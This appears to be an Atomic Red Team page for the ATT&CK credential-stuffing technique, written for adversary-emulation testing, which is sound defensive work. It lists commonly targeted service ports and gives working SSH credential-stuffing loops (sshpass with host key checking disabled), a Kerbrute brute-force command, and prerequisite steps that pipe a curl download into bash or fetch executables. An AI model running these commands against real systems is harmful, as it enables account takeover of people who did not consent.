T1110.004
Brute Force: Credential Stuffing
Description from ATT&CK
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.
Typically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:
- SSH (22/TCP)
- Telnet (23/TCP)
- FTP (21/TCP)
- NetBIOS / SMB / Samba (139/TCP & 445/TCP)
- LDAP (389/TCP)
- Kerberos (88/TCP)
- RDP / Terminal Services (3389/TCP)
- HTTP/HTTP Management Services (80/TCP & 443/TCP)
- MSSQL (1433/TCP)
- Oracle (1521/TCP)
- MySQL (3306/TCP)
- VNC (5900/TCP)
In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)
Atomic Tests
Atomic Test #1 - SSH Credential Stuffing From Linux
Using username,password combination from a password dump to login over SSH.
Supported Platforms: linux
auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| target_host | IP Address / Hostname you want to target. | string | localhost |
Attack Commands: Run with bash!
1
2
3
cp "$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt" /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
Dependencies: Run with bash!
Description: Requires SSHPASS
Check Prereq Commands:
1
2
if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
1
2
if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
Atomic Test #2 - SSH Credential Stuffing From MacOS
Using username,password combination from a password dump to login over SSH.
Supported Platforms: macos
auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| target_host | IP Address / Hostname you want to target. | string | localhost |
Attack Commands: Run with bash!
1
2
3
cp "$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt" /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
Dependencies: Run with bash!
Description: Requires SSHPASS
Check Prereq Commands:
1
2
if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
1
2
3
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/e8114640740938c20cc41ffdbf07816b428afc49/install.sh)"
brew install hudochenkov/sshpass/sshpass
Atomic Test #3 - SSH Credential Stuffing From FreeBSD
Using username,password combination from a password dump to login over SSH.
Supported Platforms: freebsd
auto_generated_guid: a790d50e-7ebf-48de-8daa-d9367e0911d4
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| target_host | IP Address / Hostname you want to target. | string | localhost |
Attack Commands: Run with sh!
1
2
3
cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
Dependencies: Run with sh!
Description: Requires SSHPASS
Check Prereq Commands:
1
2
if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
1
2
pkg install -y sshpass
Atomic Test #4 - Brute Force:Credential Stuffing using Kerbrute Tool
Will read username and password combos from a file or stdin (format username:password) and perform a bruteforce attack
Supported Platforms: windows
auto_generated_guid: 4852c630-87a9-409b-bb5e-5dc12c9ebcde
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| domaincontroller | Domain controller where test will be run | string | $ENV:userdnsdomain |
| domain | Domain where you will be testing | string | $ENV:userdomain |
Attack Commands: Run with powershell!
1
2
3
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe bruteforce --dc #{domaincontroller} -d #{domain} "PathToAtomicsFolder\..\ExternalPayloads\bruteforce.txt"
Dependencies: Run with powershell!
Description: kerbrute.exe must exist in PathToAtomicsFolder..\ExternalPayloads
Check Prereq Commands:
1
2
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"){exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"
Description: bruteforce.txt must exist in PathToAtomicsFolder..\ExternalPayloads
Check Prereq Commands:
1
2
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\bruteforce.txt"){exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/src/bruteforce.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\bruteforce.txt"